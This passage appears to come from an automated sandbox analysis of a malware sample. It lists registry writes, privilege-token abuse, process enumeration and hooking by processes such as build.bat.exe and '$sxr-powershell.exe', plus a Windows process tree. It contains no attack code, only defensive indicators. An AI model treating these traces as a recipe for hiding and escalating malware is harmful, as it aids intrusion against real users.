Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259} Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\GroupByDirection = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000e0859ff2f94f6810ab9108002b27b3d90500000058000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0 = 4a00310000000000215a5dbd1000696d6700380009000400efbe215a5dbd215a5dbd2e000000d03d0200000007000000000000000000000000000000c12c710069006d006700000012000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 = 5600310000000000215a6ebd100057696e646f777300400009000400efbe874f7748215a6ebd2e00000000060000000001000000000000000000000000000000d409ba00570069006e0064006f0077007300000016000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\LogicalViewMode = "3" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6056 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3524 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4556 msedge.exe 4556 msedge.exe 3228 msedge.exe 3228 msedge.exe 2140 identity_helper.exe 2140 identity_helper.exe 1340 msedge.exe 1340 msedge.exe 700 build.bat.exe 700 build.bat.exe 700 build.bat.exe 700 build.bat.exe 2744 dllhost.exe 2744 dllhost.exe 2744 dllhost.exe 2744 dllhost.exe 700 build.bat.exe 700 build.bat.exe 2396 $sxr-powershell.exe 2396 $sxr-powershell.exe 2396 $sxr-powershell.exe 2396 $sxr-powershell.exe 2396 $sxr-powershell.exe 4648 dllhost.exe 4648 dllhost.exe 4648 dllhost.exe 4648 dllhost.exe 2396 $sxr-powershell.exe 2396 $sxr-powershell.exe 3832 $sxr-powershell.exe 3832 $sxr-powershell.exe 3832 $sxr-powershell.exe 2396 $sxr-powershell.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 3832 $sxr-powershell.exe 3832 $sxr-powershell.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe 2408 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3524 Explorer.EXE 2684 taskhostw.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 24 IoCs
pid Process 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: 33 2792 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2792 AUDIODG.EXE Token: SeDebugPrivilege 700 build.bat.exe Token: SeDebugPrivilege 700 build.bat.exe Token: SeDebugPrivilege 2744 dllhost.exe Token: SeDebugPrivilege 2396 $sxr-powershell.exe Token: SeDebugPrivilege 2396 $sxr-powershell.exe Token: SeDebugPrivilege 4648 dllhost.exe Token: SeDebugPrivilege 3832 $sxr-powershell.exe Token: SeDebugPrivilege 2396 $sxr-powershell.exe Token: SeDebugPrivilege 2408 dllhost.exe Token: SeShutdownPrivilege 3524 Explorer.EXE Token: SeCreatePagefilePrivilege 3524 Explorer.EXE Token: SeDebugPrivilege 700 build.bat.exe Token: SeDebugPrivilege 5716 dllhost.exe Token: SeDebugPrivilege 700 build.bat.exe Token: SeDebugPrivilege 5456 dllhost.exe Token: SeShutdownPrivilege 384 dwm.exe Token: SeCreatePagefilePrivilege 384 dwm.exe Token: SeDebugPrivilege 5672 taskkill.exe Token: SeAssignPrimaryTokenPrivilege 2296 svchost.exe Token: SeIncreaseQuotaPrivilege 2296 svchost.exe Token: SeSecurityPrivilege 2296 svchost.exe Token: SeTakeOwnershipPrivilege 2296 svchost.exe Token: SeLoadDriverPrivilege 2296 svchost.exe Token: SeSystemtimePrivilege 2296 svchost.exe Token: SeBackupPrivilege 2296 svchost.exe Token: SeRestorePrivilege 2296 svchost.exe Token: SeShutdownPrivilege 2296 svchost.exe Token: SeSystemEnvironmentPrivilege 2296 svchost.exe Token: SeUndockPrivilege 2296 svchost.exe Token: SeManageVolumePrivilege 2296 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2296 svchost.exe Token: SeIncreaseQuotaPrivilege 2296 svchost.exe Token: SeSecurityPrivilege 2296 svchost.exe Token: SeTakeOwnershipPrivilege 2296 svchost.exe Token: SeLoadDriverPrivilege 2296 svchost.exe Token: SeSystemtimePrivilege 2296 svchost.exe Token: SeBackupPrivilege 2296 svchost.exe Token: SeRestorePrivilege 2296 svchost.exe Token: SeShutdownPrivilege 2296 svchost.exe Token: SeSystemEnvironmentPrivilege 2296 svchost.exe Token: SeUndockPrivilege 2296 svchost.exe Token: SeManageVolumePrivilege 2296 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2296 svchost.exe Token: SeIncreaseQuotaPrivilege 2296 svchost.exe Token: SeSecurityPrivilege 2296 svchost.exe Token: SeTakeOwnershipPrivilege 2296 svchost.exe Token: SeLoadDriverPrivilege 2296 svchost.exe Token: SeSystemtimePrivilege 2296 svchost.exe Token: SeBackupPrivilege 2296 svchost.exe Token: SeRestorePrivilege 2296 svchost.exe Token: SeShutdownPrivilege 2296 svchost.exe Token: SeSystemEnvironmentPrivilege 2296 svchost.exe Token: SeUndockPrivilege 2296 svchost.exe Token: SeManageVolumePrivilege 2296 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2296 svchost.exe Token: SeIncreaseQuotaPrivilege 2296 svchost.exe Token: SeSecurityPrivilege 2296 svchost.exe Token: SeTakeOwnershipPrivilege 2296 svchost.exe Token: SeLoadDriverPrivilege 2296 svchost.exe Token: SeSystemtimePrivilege 2296 svchost.exe Token: SeBackupPrivilege 2296 svchost.exe Token: SeRestorePrivilege 2296 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 5392 Conhost.exe 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3228 msedge.exe 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE -
Suspicious use of SetWindowsHookEx 20 IoCs
pid Process 2396 $sxr-powershell.exe 4988 Conhost.exe 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 6052 $sxr-powershell.exe 3524 Explorer.EXE 3524 Explorer.EXE 6440 Conhost.exe -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 4772 RuntimeBroker.exe 2432 sihost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3228 wrote to memory of 3360 3228 msedge.exe 83 PID 3228 wrote to memory of 3360 3228 msedge.exe 83 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 3184 3228 msedge.exe 84 PID 3228 wrote to memory of 4556 3228 msedge.exe 85 PID 3228 wrote to memory of 4556 3228 msedge.exe 85 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 PID 3228 wrote to memory of 3576 3228 msedge.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5312 attrib.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:384
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d2e7add7-8eb9-46a9-acba-dd5e63b79d3d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2ade88b5-a55b-4c92-9049-7f098d3d7727}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4648
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c17b99c2-c5db-4b2e-ade3-e028a00c6ebe}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6b2379f7-90c5-4a4c-a11c-7d88ff936807}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5716
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5434d742-5ad2-4677-8595-651fdd6d9b08}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5456
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{90ebcc79-eff1-4f87-9f58-a2cd36be45ff}2⤵PID:5416
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{90821822-cf5c-4156-8fd8-8cadc68d76c0}2⤵PID:2716
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d4e754eb-dc2a-40fe-8e21-a161b2111196}2⤵PID:5356
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f7b8f8fe-0617-4a1e-8f4f-6ee340f97622}2⤵PID:432
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{004f97d3-0889-4e45-a248-c7c65908f52a}2⤵PID:5736
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:376
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:692
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1144 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2684
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1264
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1360
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1564
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Suspicious use of UnmapMainImage
PID:2432
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
- Modifies Internet Explorer settings
PID:1788 -
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x424 0x4c82⤵
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1936
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2000
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2008
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1716
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2184
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2756
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2860
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2768
-
